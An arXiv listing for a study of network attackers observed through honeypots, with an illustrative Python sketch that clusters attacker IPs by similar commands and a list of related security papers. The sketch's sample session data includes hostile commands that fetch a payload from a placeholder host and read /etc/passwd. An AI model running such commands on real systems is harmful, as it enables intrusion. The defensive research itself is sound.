Measuring and Clustering Network Attackers using Medium-Interaction
Honeypots
- URL: http://arxiv.org/abs/2206.13614v1
- Date: Mon, 27 Jun 2022 20:19:39 GMT
- Title: Measuring and Clustering Network Attackers using Medium-Interaction
Honeypots
- Authors: Zain Shamsi, Daniel Zhang, Daehyun Kyoung, Alex Liu
- Abstract summary: Honeypots are often used by information security teams to measure the threat landscape in order to secure their networks.
In this work, we deploy such honeypots on five different protocols on the public Internet and study the intent and sophistication of the attacks we observe.
We then use the information gained to develop a clustering approach that identifies correlations in attacker behavior to discover IPs that are highly likely to be controlled by a single operator.
- Score: 5.524750830120598
- License: http://creativecommons.org/licenses/by-sa/4.0/
- Abstract: Network honeypots are often used by information security teams to measure the
threat landscape in order to secure their networks. With the advancement of
honeypot development, today's medium-interaction honeypots provide a way for
security teams and researchers to deploy these active defense tools that
require little maintenance on a variety of protocols. In this work, we deploy
such honeypots on five different protocols on the public Internet and study the
intent and sophistication of the attacks we observe. We then use the
information gained to develop a clustering approach that identifies
correlations in attacker behavior to discover IPs that are highly likely to be
controlled by a single operator, illustrating the advantage of using these
honeypots for data collection.
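The listing does not detail the clustering approach itself. As a rough illustration only, attacker IPs could be grouped by the similarity of the commands they issue to a honeypot. The sketch below is a minimal, hypothetical example and not the paper's actual method: the `sessions` data, the Jaccard threshold of 0.8, and the union-find single-linkage grouping are all assumptions.

```python
from itertools import combinations

def jaccard(a, b):
    """Jaccard similarity of two command sets."""
    if not a and not b:
        return 1.0
    return len(a & b) / len(a | b)

def cluster_ips(sessions, threshold=0.8):
    """Group attacker IPs whose observed command sets are highly similar.

    sessions: dict mapping IP -> set of commands seen from that IP.
    Returns a list of clusters (sets of IPs), formed by single-linkage
    grouping with union-find: any pair above the similarity threshold
    is merged into the same cluster.
    """
    parent = {ip: ip for ip in sessions}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(x, y):
        parent[find(x)] = find(y)

    for ip1, ip2 in combinations(sessions, 2):
        if jaccard(sessions[ip1], sessions[ip2]) >= threshold:
            union(ip1, ip2)

    clusters = {}
    for ip in sessions:
        clusters.setdefault(find(ip), set()).add(ip)
    return list(clusters.values())

# Hypothetical session logs from an SSH honeypot (illustrative data only)
sessions = {
    "198.51.100.7": {"uname -a", "wget http://x/payload", "chmod +x payload"},
    "203.0.113.42": {"uname -a", "wget http://x/payload", "chmod +x payload"},
    "192.0.2.99":   {"cat /etc/passwd", "ls -la"},
}
print(cluster_ips(sessions, threshold=0.8))
```

With this toy data, the first two IPs issue identical command sets and fall into one cluster, consistent with the intuition that near-identical behavior suggests a single operator; the third IP remains alone. A real deployment would likely use richer features (timing, credentials tried, payload hashes) rather than raw command sets.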
Related papers
- Robust Federated Learning Mitigates Client-side Training Data Distribution Inference Attacks [48.70867241987739]
InferGuard is a novel Byzantine-robust aggregation rule aimed at defending against client-side training data distribution inference attacks.
The results of our experiments indicate that our defense mechanism is highly effective in protecting against client-side training data distribution inference attacks.
arXiv Detail & Related papers (2024-03-05T17:41:35Z)
- A Survey and Comparative Analysis of Security Properties of CAN Authentication Protocols [92.81385447582882]
The Controller Area Network (CAN) bus renders in-vehicle communications inherently insecure.
This paper reviews and compares the 15 most prominent authentication protocols for the CAN bus.
We evaluate protocols based on essential operational criteria that contribute to ease of implementation.
arXiv Detail & Related papers (2024-01-19T14:52:04Z)
- Graph Neural Networks for Decentralized Multi-Agent Perimeter Defense [111.9039128130633]
We develop an imitation learning framework that learns a mapping from defenders' local perceptions and their communication graph to their actions.
We run perimeter defense games in scenarios with different team sizes and configurations to demonstrate the performance of the learned network.
arXiv Detail & Related papers (2023-01-23T19:35:59Z)
- Honeypot Implementation in a Cloud Environment [0.0]
This thesis presents a honeypot solution to investigate malicious activities in heiCLOUD.
To detect attackers in restricted network zones at Heidelberg University, a new concept to discover leaks in the firewall will be created.
A customized OpenSSH server that works as an intermediary instance will be presented.
arXiv Detail & Related papers (2023-01-02T15:02:54Z)
- Network-Level Adversaries in Federated Learning [21.222645649379672]
We study the impact of network-level adversaries on training federated learning models.
We show that attackers dropping the network traffic from carefully selected clients can significantly decrease model accuracy on a target population.
We develop a server-side defense which mitigates the impact of our attacks by identifying and up-sampling clients likely to positively contribute towards target accuracy.
arXiv Detail & Related papers (2022-08-27T02:42:04Z)
- RelaxLoss: Defending Membership Inference Attacks without Losing Utility [68.48117818874155]
We propose a novel training framework based on a relaxed loss with a more achievable learning target.
RelaxLoss is applicable to any classification model with added benefits of easy implementation and negligible overhead.
Our approach consistently outperforms state-of-the-art defense mechanisms in terms of resilience against MIAs.
arXiv Detail & Related papers (2022-07-12T19:34:47Z)
- What are Attackers after on IoT Devices? An approach based on a multi-phased multi-faceted IoT honeypot ecosystem and data clustering [11.672070081489565]
Honeypots have been historically used as decoy devices to help researchers gain a better understanding of the dynamic of threats on a network.
In this work, we present a new approach to creating a multi-phased, multi-faceted honeypot ecosystem.
We were able to collect increasingly sophisticated attack data in each phase.
arXiv Detail & Related papers (2021-12-21T04:11:45Z)
- HoneyCar: A Framework to Configure Honeypot Vulnerabilities on the Internet of Vehicles [5.248912296890883]
The Internet of Vehicles (IoV) has promising socio-economic benefits but also poses new cyber-physical threats.
Data on vehicular attackers can be realistically gathered through cyber threat intelligence using systems like honeypots.
We present HoneyCar, a novel decision support framework for honeypot deception.
arXiv Detail & Related papers (2021-11-03T17:31:56Z)
- Learning Connectivity for Data Distribution in Robot Teams [96.39864514115136]
We propose a task-agnostic, decentralized, low-latency method for data distribution in ad-hoc networks using Graph Neural Networks (GNNs).
Our approach enables multi-agent algorithms based on global state information to function by ensuring that state is available at each robot.
We train the distributed GNN communication policies via reinforcement learning using the average Age of Information as the reward function and show that it improves training stability compared to task-specific reward functions.
arXiv Detail & Related papers (2021-03-08T21:48:55Z)
- Adversarial Attacks On Multi-Agent Communication [80.4392160849506]
Modern autonomous systems will soon be deployed at scale, opening up the possibility for cooperative multi-agent systems.
Such advantages rely heavily on communication channels which have been shown to be vulnerable to security breaches.
In this paper, we explore such adversarial attacks in a novel multi-agent setting where agents communicate by sharing learned intermediate representations.
arXiv Detail & Related papers (2021-01-17T00:35:26Z)
- Unleashing the Tiger: Inference Attacks on Split Learning [2.492607582091531]
We introduce general attack strategies targeting the reconstruction of clients' private training sets.
A malicious server can actively hijack the learning process of the distributed model.
We demonstrate our attack is able to overcome recently proposed defensive techniques.
arXiv Detail & Related papers (2020-12-04T15:41:00Z)
This list is automatically generated from the titles and abstracts of the papers in this site.
This site does not guarantee the quality of this information and is not responsible for any consequences of its use.